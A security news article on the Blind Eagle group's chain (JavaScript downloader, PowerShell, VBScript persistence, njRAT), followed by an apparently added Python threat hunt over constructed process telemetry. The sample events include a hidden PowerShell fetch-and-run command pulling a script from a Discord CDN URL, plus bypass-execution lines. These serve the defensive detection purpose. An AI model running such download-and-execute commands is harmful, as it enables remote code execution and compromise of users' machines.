Blind Eagle Cyber Espionage Group Strikes Again: New Attack Chain Uncovered
Security News, April 2023
The cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
"The group is known for using a variety of sophisticated attack techniques, including custom malware, social engineering tactics, and spear-phishing attacks," ThreatMon said in a Tuesday report.
Blind Eagle, also referred to as APT-C-36, is a suspected Spanish-speaking group that chiefly strikes private and public sector entities in Colombia.
Infection chains documented by Check Point and BlackBerry this year have revealed the use of spear-phishing lures to deliver commodity malware families like BitRAT, AsyncRAT, and in-memory Python loaders capable of launching a Meterpreter payload.

The latest discovery from ThreatMon entails the use of a JavaScript downloader to execute a PowerShell script hosted on Discord's CDN. The script, in turn, drops another PowerShell script and a Windows batch file, and saves a VBScript file in the Windows Startup folder to achieve persistence.
The VBScript code is then run to launch the batch file, which is subsequently deobfuscated to run the PowerShell script that was previously delivered along with it.
In the final stage, the PowerShell script is used to execute njRAT. "NjRAT, also known as Bladabindi is a remote access tool with user interface or trojan which allows the holder of the program to control the end-user's computer," the cybersecurity firm said.
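The chain described above leaves three observable traces in process-creation telemetry: a script host fetching from Discord's CDN, a VBScript run out of the user's Startup folder, and the wscript.exe -> cmd.exe -> powershell.exe lineage produced when the VBScript launches the batch file that launches the PowerShell stage. The following hunt is an added example, not code from the ThreatMon report or from The Hacker News; the event records are constructed Sysmon-style process-creation fields (pid, ppid, image, cmdline), and the rule names and thresholds are this example's own assumptions.

```python
"""Hunt over process-creation telemetry for the three observable stages of the
Blind Eagle chain described above.  Added example; the events below are constructed
for illustration and are not taken from the ThreatMon report."""
import re

# Constructed sample telemetry, modelled loosely on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Stage 1 (assumed): JavaScript downloader pulling a PowerShell script from Discord's CDN.
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\Downloads\invoice.js"},
    {"pid": 700, "ppid": 600,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://cdn.discordapp.com/attachments/1/2/s.ps1')\""},
    # Persistence: VBScript placed in the Startup folder launches the batch file,
    # which in turn runs the previously dropped PowerShell script.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Roaming\Microsoft\Windows'
                r'\Start Menu\Programs\Startup\update.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\run.bat"},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ep bypass -w hidden -f C:\Users\alice\AppData\Local\Temp\stage2.ps1"},
    # Benign admin activity that must not be flagged.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
]

STARTUP_VBS_RE = re.compile(r'''\\Start Menu\\Programs\\Startup\\[^"']+\.vbs''', re.IGNORECASE)
DISCORD_CDN_RE = re.compile(r"https?://cdn\.discordapp\.com/", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from pid up to the root, starting with pid itself.
    Stops at an unknown parent or on a ppid cycle (pid reuse)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def hunt(events):
    """Return (rule_name, pid) findings for each stage of the chain."""
    findings = []
    for e in events:
        img, cmd = _basename(e["image"]), e["cmdline"]
        # Stage 1: any process fetching from Discord's CDN (script hosts are the usual offenders).
        if DISCORD_CDN_RE.search(cmd):
            findings.append(("discord_cdn_download", e["pid"]))
        # Persistence: a script host executing a .vbs from the per-user Startup folder.
        if img in SCRIPT_HOSTS and STARTUP_VBS_RE.search(cmd):
            findings.append(("startup_vbs_launch", e["pid"]))
        # Execution: powershell.exe whose parent is cmd.exe whose parent is a script host.
        if img == "powershell.exe":
            chain = ancestry(events, e["pid"])
            if len(chain) >= 3 and chain[1] == "cmd.exe" and chain[2] in SCRIPT_HOSTS:
                findings.append(("vbs_to_bat_to_powershell", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The lineage rule is the most robust of the three because it does not depend on the attacker's choice of hosting or file names: whatever the VBScript and batch file are called, a PowerShell process with a cmd.exe parent and a wscript.exe grandparent is rare on a workstation outside of installers, so it is worth reviewing every hit. The Discord CDN rule only matches the URL the report describes and would need a broader allow-list review on hosts where Discord is legitimately used; the Startup folder rule should be paired with a file-creation watch on that directory, since the VBScript is written there before it is ever launched.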
News URL
https://thehackernews.com/2023/04/blind-eagle-cyber-espionage-group.html